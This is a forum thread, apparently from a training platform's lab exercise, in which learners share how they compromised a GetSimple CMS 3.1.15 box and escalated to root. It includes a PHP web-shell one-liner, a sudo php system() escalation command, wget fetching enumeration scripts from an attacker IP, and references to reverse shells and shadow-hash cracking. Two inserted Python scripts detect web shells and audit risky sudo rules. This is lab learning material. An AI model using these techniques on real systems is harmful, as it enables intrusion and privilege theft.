Getting started | Knowledge Check

Ok so here is one interesting thing I got… I was able to spawn a web shell using the following steps:

1. I was able to log in as admin through the page.
2. Then I started the Metasploit scan and navigated the whole system for like 3-4 days.
3. Then I started googling again and found out something about a GetSimple CMS 3.1.15 vulnerability that is in theme-editor.
4. I visited the theme editor and tried to edit the PHP files there and was able to spawn a webshell using the one-liner: <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
5. Then I tried the sudo -l command and it worked… (remember to URL-encode spaces to run commands)

This is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, I had to get a true reverse shell to exploit a certain binary that sudo can run. GTFOBins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! I tried like 50 times till now and still I am not able to spawn a true shell. I know afterwards that I have to exploit the PHP vulnerability using GTFOBins, but how? Please help…

I uploaded a PHP web shell on the theme editor page, then set up a listener on my local machine, and used a PHP reverse shell one-liner.

BUT were you able to navigate out of the current working directory? Because last time I tried I wasn't able to navigate out of the current working directory. And that's not it: how were you able to use the PHP webshell and listen on your device? How were you able to use a listener with a PHP webshell, because a webshell can be accessed by using the web browser or cURL.
But I am gonna try it now and explore myself. I will read your answer after I complete the module :smiley:
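The exchange above is about planting a command-execution one-liner in an editable theme file. An added example, not code from the thread or from GetSimple CMS, showing the defender's side: a Python check that flags theme PHP files which drift from a known-good hash baseline or contain a request-controlled value flowing into an execution sink, the exact shape of the one-liner quoted above. The sample theme directory, the baseline and the file names are constructed for the demo.

```python
#!/usr/bin/env python3
"""Integrity and content check for CMS theme/template PHP files.

Added example, not part of the thread or of any CMS: flag theme files
that (a) are new or changed relative to a hash baseline captured from a
clean deployment, or (b) pass request input into an exec-style sink.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Functions that hand a string to the OS or to the PHP interpreter.
SINK_RE = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Request-controlled superglobals.
TAINT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_file(path: Path) -> list:
    """Return reasons this PHP file looks like a web shell (empty if clean)."""
    reasons = []
    text = path.read_text(encoding="utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), 1):
        # A sink and a superglobal on the same line is a strong (not perfect) signal.
        if SINK_RE.search(line) and TAINT_RE.search(line):
            reasons.append(f"line {lineno}: request input reaches an exec sink")
    return reasons


def scan_theme_dir(root, baseline: dict) -> list:
    """Compare every .php file under root with a {relpath: sha256} baseline.

    Returns a sorted list of (relpath, reason) tuples.
    """
    root = Path(root)
    findings = []
    seen = set()
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        seen.add(rel)
        if rel not in baseline:
            findings.append((rel, "not in baseline (new file)"))
        elif baseline[rel] != sha256_of(path):
            findings.append((rel, "hash differs from baseline (modified)"))
        for reason in scan_file(path):
            findings.append((rel, reason))
    for rel in sorted(set(baseline) - seen):
        findings.append((rel, "missing (deleted since baseline)"))
    return findings


def build_demo(root) -> dict:
    """Construct a sample theme directory; return a baseline covering only the clean file."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    clean = root / "template.php"
    clean.write_text("<?php get_header(); ?>\n<h1><?php echo $site_title; ?></h1>\n")
    # Constructed 'after the edit' file: the same one-liner shape discussed in the thread.
    (root / "footer.php").write_text("<?php echo shell_exec($_GET['e'].' 2>&1'); ?>\n")
    return {"template.php": sha256_of(clean)}


def run_demo() -> list:
    """Build the sample directory in a temp folder and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_theme_dir(tmp, build_demo(tmp))


if __name__ == "__main__":
    for rel, reason in run_demo():
        print(f"{rel}: {reason}")
```

In practice the baseline is captured once from a clean install (or from the release tarball) and the scan is run from cron or a file-integrity agent; an editable theme file changing outside a deployment window is the event worth alerting on, regardless of whether the content regex matches.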

Ok, I was able to get the root flag as well… Thanks for the help @dewest91 :smile:

I wonder if anyone is able to offer a helping hand, as I'm unsure how to progress. I have managed to gain a foothold by using the GetSimple msf exploit and have submitted the user flag; however, when trying to upload LinEnum I get the 200 OK response but then followed by permission denied?

I'm sure I'm doing something wrong (as is the case most times) but I'm just wondering if I am missing something stupidly obvious?

Just to be clear… I pull LinEnum.sh onto the target machine using wget http://10.10.16.95:8080/LinEnum.sh and then receive the following:

--2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
Connecting to 10.10.16.95:8080… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied

Cannot write to ‘LinEnum.sh’ (Permission denied).


So I was able to run a reverse shell via the upload command in msfconsole and curl… then… stuck.

Yes, I uploaded linenum.sh and linpeas.sh and ran them. Found exploits by grepping CVE in the reports… But they don't apply.

Like there's a sudoedit vulnerability that appears to be patched already even though the version should expose something (ran a Python and a compiled C program) but the sudoedit output indicates it was fixed.

sudo -l … Nothing exciting.

Dirty_sock/snap-confine is shown in the report, but uploading a Python exploit says it's not vulnerable.

So round and round I go for days, trying to do this. And the kicker is, usually if you know the right answer it takes 60 seconds.

The hint points to the linpeas.sh report but I got nothing.

Oh I see now. Much simpler than I was headed.

Nevermind.

I've just completed this one. The first flag (just getting a foothold) was quite easy but the second (privilege escalation) took me a full day to figure out. I think the point was to SSH into the box as a more privileged user and get the second flag. I did that but it's not actually necessary - you can get to the flag as a 'low privilege user' without having to SSH.

The hint for how i did it is:

  1. (You need to get a shell on the target).

  2. Look for the command available to you with sudo privileges - a comment above says linpeas/linenum does not help, but it showed me exactly what I needed.

  3. Find how to call system commands (through that command as sudo) to access the restricted folders.

For fun(?) I then plundered /etc/shadow, got the password hash of a user with sudo privileges, cracked it in hashcat, then SSH'ed into the target machine and got the flag. But to get to the shadow file you need the same privileges required to get the flag, so it's not actually necessary.

I hope that helps


Hello everyone, I'll share my experience of how I found the first file and what steps I followed.
Before all the scanning and a little research, I was able to get a shell with Metasploit, using module 1. How does it work? Well, this exploit creates a PHP file for the session created by meterpreter. So what I did was edit that file and enter the shell code, which after that allowed me to scratch around and get the first file from user.txt. Now I'm going for the second flag.

You're on the right track!

Could someone help me with this? I have been stuck for the past week but I am just not able to log in! I believe I found the password but I kind of suspect it's an encrypted one! I tried decrypting it but no luck! As a result, I am not able to log in and so am not able to gain the initial foothold!

Yes, it should be encrypted. You can try searching for a hash detector on Google and paste that key there to see what type of hash you want to decrypt, and then you can try different tools like John and hashcat to decrypt it. If you don't know how to use them, search on the Internet. It's supposed to be this way; don't worry, you are on the right learning path.

Okay, I got in. I tried searching around the website but the upload button doesn't seem to be working. Is there any other way I can upload the shell? I tried creating a new page but that didn't work.

Hello friend, you can try accessing it by Metasploit, then edit the session file; inside it you put your shell. Try that.

Hello all, direct me to the right path to get privileges, otherwise I can't figure out how. I went to bash via Metasploit, I can download and open PHP files, but I can't figure out how to further increase privileges.

Whoever is also stuck, try the command on the virtual machine: sudo php -r "system('$CMD');"

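The post above shows why a sudo rule that grants an interpreter is the whole game: php -r runs arbitrary code, so the rule is equivalent to an unrestricted root shell. An added example, not from the thread or from any tool it mentions, for the administrator's side: a Python audit that reads sudo -l output or sudoers lines and flags rules granting an interpreter or shell (or ALL), marking those that run as root and those tagged NOPASSWD. The sample rule text, the host name and the function names are constructed for the demo; it handles both the sudo -l listing format and raw sudoers lines.

```python
#!/usr/bin/env python3
"""Least-privilege audit of sudo rules.

Added example, not part of the thread: flag sudo rules whose command is a
language interpreter or shell, since such a rule lets the user run
arbitrary code as the runas user (root in the worst case).
"""
import re

# Binaries that execute arbitrary code by design. Granting any of these via
# sudo is equivalent to granting a shell as the runas user.
INTERPRETERS = {
    "php", "python", "python2", "python3", "perl", "ruby", "node",
    "bash", "sh", "dash", "zsh", "ksh",
}

# Matches the '(runas) [TAG:] commands' part shared by sudoers lines and
# the per-user section of 'sudo -l' output.
RULE_RE = re.compile(
    r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z!]+:\s*)*)(?P<cmds>\S.*)$"
)

# Constructed sample: what 'sudo -l' might print for a web-server account.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
    (backup) /usr/bin/python3 /opt/backup/run.py
"""

# Constructed sample in raw sudoers syntax (same rule family, two commands).
SAMPLE_SUDOERS = "www-data ALL=(ALL) NOPASSWD: /usr/bin/php, /usr/bin/python3\n"


def parse_rule(line: str):
    """Return (runas, tags, [commands]) for one rule line, or None if not a rule."""
    m = RULE_RE.search(line)
    if not m:
        return None
    tags = [t.rstrip(":") for t in re.findall(r"[A-Z!]+:", m.group("tags"))]
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return m.group("runas").strip(), tags, cmds


def runs_as_root(runas: str) -> bool:
    """Empty runas means root; 'ALL' or an explicit root user also counts."""
    users = [u.strip() for u in runas.split(":")[0].split(",")]
    return users == [""] or any(u in ("ALL", "root") for u in users)


def audit_sudo_rules(text: str) -> list:
    """Scan sudoers / 'sudo -l' text; return (line_no, command, reason) findings."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].rstrip()   # drop sudoers comments
        parsed = parse_rule(line)
        if parsed is None:
            continue
        runas, tags, cmds = parsed
        for cmd in cmds:
            exe = cmd.split()[0]
            base = exe.rsplit("/", 1)[-1]
            reason = None
            if exe == "ALL":
                reason = "unrestricted command set"
            elif base in INTERPRETERS:
                reason = f"{base} is an interpreter/shell: rule allows arbitrary code"
            if reason is None:
                continue
            if runs_as_root(runas):
                reason = "root-equivalent: " + reason
            if "NOPASSWD" in tags:
                reason += " (NOPASSWD: no password prompt either)"
            findings.append((n, cmd, reason))
    return findings


if __name__ == "__main__":
    for n, cmd, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"line {n}: {cmd}: {reason}")
```

A clean rule, such as the systemctl line in the sample, produces no finding; the fix for a flagged rule is to replace the interpreter with a purpose-built wrapper script that takes no user-controlled arguments, owned by root and not writable by the sudoer.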

Thanks @akula993, this is what I was missing.

I finished this in a very odd way but was able to get it using full msf. If you need help, let me know on Discord: ExecPanda#2523


Do the wget from the reverse shell location you start in. Can't write in home or wherever.


This took me way too long.
Try logging in with default credentials. Very guessable.
There are plugins installed that can help you get in. Msfconsole can get you in as well.
You can upload files from your VM the same as in the previous exercise, with wget.
You have to enumerate all the things.
Ask yourself: how do I run the command listed in the enumeration?
That last part took me 4 hours. Good luck. If you need more help than that you can reach me on Discord: simulation42#4902

The first flag was pretty easy, but escalating to root could be challenging. This is how I got one foot in the door.

When you visit the site initially, you’ll notice a yellow square on the support button with an exclamation mark on it. Click on it, and it will take you to the health check page. On this page, you will see many items, including the current version of the application.
After researching the version, I found that there is a vulnerability in the theme-edit.php page, where an attacker may be able to upload arbitrary code to gain remote access to the host. Having made this discovery, I quickly referenced my already-working reverse PHP shells, and copied and pasted the code into the theme-edit.php file and/or page. Once the file was saved, I had to start a netcat listener on the port configured in my reverse shell and curl the webpage where the theme template was saved.
For working reverse shells, you may go to pentestmonkey.net.

I hope this helps.
Happy hacking!


I was able to obtain the root flag.

I did so by downloading linpeas.sh and also exploit-suggester.py. The latter worked perfectly, but you can make your choice. In researching the first CVE found for the kernel version, I found a local privilege escalation vulnerability in the polkit pkexec tool by means of memory corruption. It allows an unprivileged user to gain full root privileges.

I hope this helps.
Happy hacking!